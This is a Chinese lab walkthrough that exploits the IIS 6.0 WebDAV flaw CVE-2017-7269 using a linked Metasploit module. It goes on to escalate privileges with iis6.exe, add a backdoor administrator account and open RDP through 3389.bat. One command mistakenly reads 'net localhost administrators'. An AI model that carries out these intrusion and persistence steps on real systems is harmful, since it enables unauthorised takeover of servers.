赞
踩
IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁。
Windows 2003 R2开启WebDAV服务的IIS6.0
Windows server 2003 R2 安装IIS服务,并且开启了WebDAV
Exp下载地址:https://github.com/zcgonvh/cve-2017-7269
IIS6.exe提权工具
3389.bat
1.IIS开启WebDAV
工具检测存在CVE-2017-7269漏洞
2.github下载exp
Exp下载地址:https://github.com/zcgonvh/cve-2017-7269
3.把exp放入到msf中,#注意模块的命名名称,单词之间加下划线
这个地方有个坑,下载的exp:cve-2017-7269 直接放在metasploit中是不能加载识别的,得把cve-2017-7269修改为cve_2017_7269
将桌面上的cve_2017_7269.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/iis/目录下
命令:cp /root/桌面/cve_2017_7269.rb /usr/share/metasploit-framework/modules/exploits/windows/iis/
给cve_2017_7269.rb执行权限
打开metasploit重新加载exp模块,加载完模块之后,exp数量会增加1
4.使用模块,设置参数
设置参数模块如下设置即可
忘记截图了一个,还有一个命令:set lhost 192.168.36.129(kali地址)
返回shell,查看当前用户权限,发现是一般用户权限
cd到网站目录,寻找一个可以创建文件夹的目录,一个一个寻找
按Ctrl + C退出shell,输出y
利用Metasploit的上传功能,把提权工具iis6.exe上传到刚刚新建的文件里(提权工具有很多,iis6.exe,pr.exe等等)
又回到shell里面确定工具上传是否成功
利用工具进行提权,命令:iis6.exe “whoami”,已经是system权限了
进行新建用户,iis6.exe “net user xiaohua xiaohua123 /add”
添加用户到管理员,iis6.exe “net localhost administrators xiaohua /add”
查看远程连接是否打开,没有打开,命令:netstat -an
再上传一个开3389.bat,利用iis6.exe运行,打开目标机的3389端口(上传3389.bat的方法和上面iis6.exe上传方法一样)
命令:iis6.exe “3389.bat”
查看是否打开,netstat -an,已经成功打开
进行远程连接
禁用WebDAV
更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。